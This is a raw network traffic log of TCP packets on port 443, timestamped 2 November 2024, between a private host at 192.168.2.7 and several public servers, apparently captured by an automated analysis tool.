Nov 2, 2024 17:56:46.866374016 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.866565943 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.866573095 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.873823881 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.873886108 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.873897076 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.917921066 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.917975903 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.917995930 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.962447882 CET	49879	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.962531090 CET	443	49879	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:46.962603092 CET	49879	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.962927103 CET	49870	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:46.963047028 CET	49877	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:46.963083029 CET	49878	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:46.963308096 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:46.963351011 CET	443	49849	18.244.18.27	192.168.2.7
Nov 2, 2024 17:56:46.963407040 CET	49849	443	192.168.2.7	18.244.18.27
Nov 2, 2024 17:56:46.963669062 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:46.963705063 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:46.963766098 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:46.964211941 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.964232922 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:46.964273930 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.964628935 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.964648008 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:46.964775085 CET	49871	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.964988947 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.965023041 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:46.965100050 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.965270996 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:46.965284109 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:46.965651989 CET	49879	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.965697050 CET	443	49879	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:46.965760946 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:46.965775967 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:46.972449064 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.972532988 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.972542048 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.972655058 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.972704887 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.972709894 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.982320070 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.982487917 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.982498884 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.985423088 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.985486984 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.985493898 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.985585928 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.985737085 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.985743046 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.985893011 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.985960960 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.987406015 CET	49856	443	192.168.2.7	172.217.16.129
Nov 2, 2024 17:56:46.987420082 CET	443	49856	172.217.16.129	192.168.2.7
Nov 2, 2024 17:56:46.990540981 CET	443	49870	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:46.990613937 CET	49870	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.003331900 CET	443	49877	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.003334045 CET	443	49878	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.011322975 CET	443	49871	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.024893999 CET	443	49871	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.024959087 CET	49871	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.502141953 CET	443	49873	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.503825903 CET	443	49872	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.505129099 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:47.505170107 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:47.505520105 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:47.505544901 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:47.505553007 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:47.505624056 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:47.505971909 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:47.505989075 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:47.506526947 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:47.506539106 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:47.508795977 CET	443	49877	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.508857965 CET	49877	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.509108067 CET	443	49878	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.509205103 CET	49878	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.509536982 CET	49873	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.509551048 CET	443	49873	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.509996891 CET	49873	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.510000944 CET	443	49873	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.510380983 CET	49872	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.510392904 CET	443	49872	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.510812998 CET	49872	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.510817051 CET	443	49872	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.587447882 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.587901115 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.587929010 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.588968039 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.590167046 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.590260029 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.590329885 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.594733953 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.594875097 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.595539093 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.595551014 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.595689058 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.595704079 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.595894098 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.596942902 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.597008944 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.598969936 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.599047899 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.599109888 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.599700928 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.599764109 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.599770069 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.603844881 CET	443	49879	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.604053974 CET	49879	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.604073048 CET	443	49879	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.604394913 CET	443	49879	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.604686022 CET	49879	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.604753971 CET	443	49879	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.626173973 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.627854109 CET	443	49875	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.630104065 CET	443	49876	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.631129980 CET	49874	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.631165028 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.631690979 CET	49874	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.631696939 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.632481098 CET	49875	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.632504940 CET	443	49875	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.632926941 CET	49875	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.632932901 CET	443	49875	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.634051085 CET	49876	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.634080887 CET	443	49876	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.634603977 CET	49876	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.634612083 CET	443	49876	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.635327101 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.635710001 CET	443	49873	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.635771036 CET	443	49873	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.635819912 CET	49873	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.636738062 CET	49873	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.636758089 CET	443	49873	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.636768103 CET	49873	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.636774063 CET	443	49873	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.638545990 CET	443	49872	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.638926983 CET	443	49872	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.638973951 CET	49872	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.640197992 CET	49872	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.640213013 CET	443	49872	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.640222073 CET	49872	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.640227079 CET	443	49872	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.643330097 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.645025969 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.645056009 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.645149946 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.645318985 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.645323992 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.647322893 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.647875071 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.647897959 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.648020983 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.648108006 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.648122072 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.704001904 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.704024076 CET	443	49880	162.159.61.3	192.168.2.7
Nov 2, 2024 17:56:47.704123020 CET	49880	443	192.168.2.7	162.159.61.3
Nov 2, 2024 17:56:47.705164909 CET	49879	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.721240997 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.732567072 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.732621908 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.732728004 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.733521938 CET	49882	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.733535051 CET	443	49882	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.738215923 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.738296032 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.738338947 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.739837885 CET	49881	443	192.168.2.7	172.64.41.3
Nov 2, 2024 17:56:47.739855051 CET	443	49881	172.64.41.3	192.168.2.7
Nov 2, 2024 17:56:47.740295887 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:47.740331888 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:47.740389109 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:47.740645885 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:47.740662098 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:47.758692026 CET	443	49875	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.758750916 CET	443	49875	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.758790016 CET	49875	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.761274099 CET	443	49876	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.761324883 CET	443	49876	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.761533022 CET	49876	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.768443108 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.768467903 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.768511057 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.768531084 CET	49874	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.768778086 CET	49874	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.771936893 CET	49875	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.771953106 CET	443	49875	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.771962881 CET	49875	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.771969080 CET	443	49875	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.774698973 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.774729013 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.774780989 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.775188923 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.775202990 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.775509119 CET	49876	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.775528908 CET	443	49876	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.775541067 CET	49876	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.775547028 CET	443	49876	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.785676003 CET	49874	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.785696030 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.785706043 CET	49874	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.785711050 CET	443	49874	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.803003073 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.803046942 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.803098917 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.805895090 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.805913925 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.806514025 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.806555033 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:47.806981087 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.807446003 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:47.807460070 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.183743000 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.183785915 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.183856964 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.184086084 CET	49893	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.184101105 CET	443	49893	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.276349068 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.277657032 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.277682066 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.278786898 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.278867960 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.279958010 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.280024052 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.280231953 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.280239105 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.308295012 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.308535099 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.308553934 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.309583902 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.309645891 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.310864925 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.310931921 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.311345100 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.311357021 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.382781982 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.383280993 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.383316040 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.383763075 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.383769989 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.405385971 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.405558109 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.407104969 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.407124996 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.407922983 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.407928944 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.421633005 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.428985119 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.429012060 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.429066896 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.429430008 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.429853916 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.429872036 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.429884911 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.429910898 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.429919004 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.429939032 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.429961920 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.430028915 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.430886984 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.430896044 CET	443	49885	152.195.19.97	192.168.2.7
Nov 2, 2024 17:56:48.430929899 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.430965900 CET	49885	443	192.168.2.7	152.195.19.97
Nov 2, 2024 17:56:48.431468964 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.431484938 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.437335014 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.437587976 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.437598944 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.437968969 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.438024044 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.438716888 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.438771963 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.439655066 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.439718008 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.439842939 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.440093994 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.440100908 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:48.513592958 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.513678074 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.514502048 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.514544964 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.524621964 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.524621964 CET	49887	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.524646997 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.524660110 CET	443	49887	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.525794029 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.525839090 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.526225090 CET	49890	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.526231050 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.528695107 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.528778076 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.529057026 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.529402018 CET	49895	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.529434919 CET	443	49895	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.550153971 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.550658941 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.550687075 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.550929070 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.551214933 CET	49891	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.551222086 CET	443	49891	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.551347017 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.551392078 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.551455021 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.551485062 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.551485062 CET	49888	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.551503897 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.551513910 CET	443	49888	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.553894043 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.553936005 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.554069996 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.554255962 CET	49896	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.554265022 CET	443	49896	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.555949926 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.561669111 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.561697006 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.561865091 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.561892033 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.561898947 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.561913013 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.561918974 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.561927080 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.561950922 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.561991930 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.562026024 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.562205076 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.562450886 CET	49892	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:48.562458992 CET	443	49892	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.574317932 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.574327946 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.574359894 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.574390888 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.574395895 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.574409008 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:48.574438095 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.574459076 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:48.621922016 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:48.653745890 CET	443	49890	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:48.653826952 CET	443	49890	13.107.246.45	192.168.2.7
